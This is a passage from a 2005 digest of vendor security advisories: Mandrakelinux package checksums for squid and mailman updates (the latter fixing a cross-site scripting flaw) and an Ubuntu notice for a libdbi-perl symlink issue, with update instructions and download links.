01d6b3dfa7dc5dd5cf1a95c14492f18c amd64/10.0/RPMS/squid-2.5.STABLE4-2.3.100mdk.amd64.rpm
c2cb0554ab7225eef74bef946ffe359d amd64/10.0/SRPMS/squid-2.5.STABLE4-2.3.100mdk.src.rpm

Mandrakelinux 10.1:
59493538203620d5bcaabaa23d601446 10.1/RPMS/squid-2.5.STABLE6-2.2.101mdk.i586.rpm
e54c318ee8ec23a28f7ab799e7caad33 10.1/SRPMS/squid-2.5.STABLE6-2.2.101mdk.src.rpm

Mandrakelinux 10.1/X86_64:
f11e4cc06bcface8d67e8505eaa96723 x86_64/10.1/RPMS/squid-2.5.STABLE6-2.2.101mdk.x86_64.rpm
e54c318ee8ec23a28f7ab799e7caad33 x86_64/10.1/SRPMS/squid-2.5.STABLE6-2.2.101mdk.src.rpm

Corporate Server 2.1:
a42ac4049889e5b7123be68f65784f79 corporate/2.1/RPMS/squid-2.4.STABLE7-2.3.C21mdk.i586.rpm
dfc6cc283c301c3f4495e3a8f7ddcd63 corporate/2.1/SRPMS/squid-2.4.STABLE7-2.3.C21mdk.src.rpm

Corporate Server 2.1/x86_64:
903517606084ab4d37e2a52506eed1a5 x86_64/corporate/2.1/RPMS/squid-2.4.STABLE7-2.3.C21mdk.x86_64.rpm
dfc6cc283c301c3f4495e3a8f7ddcd63 x86_64/corporate/2.1/SRPMS/squid-2.4.STABLE7-2.3.C21mdk.src.rpm

Corporate Server 3.0:
c3567af5bc3b38291199904d81165879 corporate/3.0/RPMS/squid-2.5.STABLE4-2.3.C30mdk.i586.rpm
89d53797c271b1897f775d75c4bb4b9e corporate/3.0/SRPMS/squid-2.5.STABLE4-2.3.C30mdk.src.rpm

Mandrakelinux 9.2:
b200e4cd5136b605665675c22a07f8f6 9.2/RPMS/squid-2.5.STABLE3-3.5.92mdk.i586.rpm
3ad2ffec1411fae0708f4f3e00505fa3 9.2/SRPMS/squid-2.5.STABLE3-3.5.92mdk.src.rpm

Mandrakelinux 9.2/AMD64:
e3eff312ad7b514582575f076f26e5fb amd64/9.2/RPMS/squid-2.5.STABLE3-3.5.92mdk.amd64.rpm
3ad2ffec1411fae0708f4f3e00505fa3 amd64/9.2/SRPMS/squid-2.5.STABLE3-3.5.92mdk.src.rpm


To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandrakelinux at:

http://www.mandrakesoft.com/security/advisories

If you want to report vulnerabilities, please contact

security_linux-mandrake.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team <security linux-mandrake.com>


Mandrakelinux Security Update Advisory


Package name: mailman
Advisory ID: MDKSA-2005:015
Date: January 24th, 2005
Affected versions: 10.0, 10.1, Corporate Server 2.1, Corporate Server 3.0


Problem Description:

Florian Weimer discovered a vulnerability in Mailman, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input is not properly sanitised by "scripts/driver" when returning error pages. This can be exploited to execute arbitrary HTML or script code in a user's browser session in context of a vulnerable site by tricking a user into visiting a malicious web site or follow a specially crafted link. (CAN-2004-1177).


References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-1177


Updated Packages:

Mandrakelinux 10.0:
ae373070860eb1c736fcf66fd2c55d96 10.0/RPMS/mailman-2.1.4-2.2.100mdk.i586.rpm
fec2dfd480fc02b17ccff70dd99b4db7 10.0/SRPMS/mailman-2.1.4-2.2.100mdk.src.rpm

Mandrakelinux 10.0/AMD64:
e8b98f2b51d9f11b87bc0a0391d44099 amd64/10.0/RPMS/mailman-2.1.4-2.2.100mdk.amd64.rpm
fec2dfd480fc02b17ccff70dd99b4db7 amd64/10.0/SRPMS/mailman-2.1.4-2.2.100mdk.src.rpm

Mandrakelinux 10.1:
8dd23a3f24902dfd6c79bf86607652fb 10.1/RPMS/mailman-2.1.5-7.2.101mdk.i586.rpm
60d219904e0b21f46b6d2867d6f180bb 10.1/SRPMS/mailman-2.1.5-7.2.101mdk.src.rpm

Mandrakelinux 10.1/X86_64:
0f6eef6e7475e333a44b6dbead106f64 x86_64/10.1/RPMS/mailman-2.1.5-7.2.101mdk.x86_64.rpm
60d219904e0b21f46b6d2867d6f180bb x86_64/10.1/SRPMS/mailman-2.1.5-7.2.101mdk.src.rpm

Corporate Server 2.1:
6dcfa5a401a8e7fc76a539a62374e18f corporate/2.1/RPMS/mailman-2.0.14-1.2.C21mdk.i586.rpm
ceef33d5629e03e18760f8c001956664 corporate/2.1/SRPMS/mailman-2.0.14-1.2.C21mdk.src.rpm

Corporate Server 2.1/x86_64:
0205dc5fd874578803b487dd58baad5e x86_64/corporate/2.1/RPMS/mailman-2.0.14-1.2.C21mdk.x86_64.rpm
ceef33d5629e03e18760f8c001956664 x86_64/corporate/2.1/SRPMS/mailman-2.0.14-1.2.C21mdk.src.rpm

Corporate Server 3.0:
6ba4581b2060d821d0d95b780fc80f16 corporate/3.0/RPMS/mailman-2.1.4-2.2.C30mdk.i586.rpm
cfaf275a70905bede0d23767dbe1be25 corporate/3.0/SRPMS/mailman-2.1.4-2.2.C30mdk.src.rpm


To upgrade automatically use MandrakeUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandrakesoft for security. You can obtain the GPG public key of the Mandrakelinux Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandrakelinux at:

http://www.mandrakesoft.com/security/advisories

If you want to report vulnerabilities, please contact

security_linux-mandrake.com

Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Linux Mandrake Security Team <security linux-mandrake.com>


Ubuntu Linux


Ubuntu Security Notice USN-70-1 January 25, 2005
libdbi-perl vulnerabilities
CAN-2005-0077

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

libdbi-perl

The problem can be corrected by upgrading the affected package to version 1.42-3ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Javier Fernãndez-Sanguino Peña from the Debian Security Audit Project discovered that the module DBI::ProxyServer in Perl's DBI library created a PID file in an insecure manner. This could allow a symbolic link attack to create or overwrite arbitrary files with the privileges of the user invoking a program using this module (like 'dbiproxy').

Now the module does not create a such a PID file by default.

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1.diff.gz

Size/MD5: 13840 0ea63225d70126bd2492516466a2209d
http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1.dsc

Size/MD5: 608 f6a5286d0a38572cd3ff944669ecf457
http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42.orig.tar.gz

Size/MD5: 348167 ca8c8a1a4797d98121b41c1d0a5b3b7c

amd64 architecture (Athlon64, Opteron, EM64T Xeon)

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1_amd64.deb

Size/MD5: 575324 487ed69858f7a4d6b0bc4810ea9b99ec

i386 architecture (x86 compatible Intel/AMD)

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1_i386.deb

Size/MD5: 573900 eb99ce7af5c6c89bdc969210107807ae

powerpc architecture (Apple Macintosh G3/G4/G5)

http://security.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.42-3ubuntu0.1_powerpc.deb

Size/MD5: 577426 58c6f55a93ba0081a0737d16449a0dc8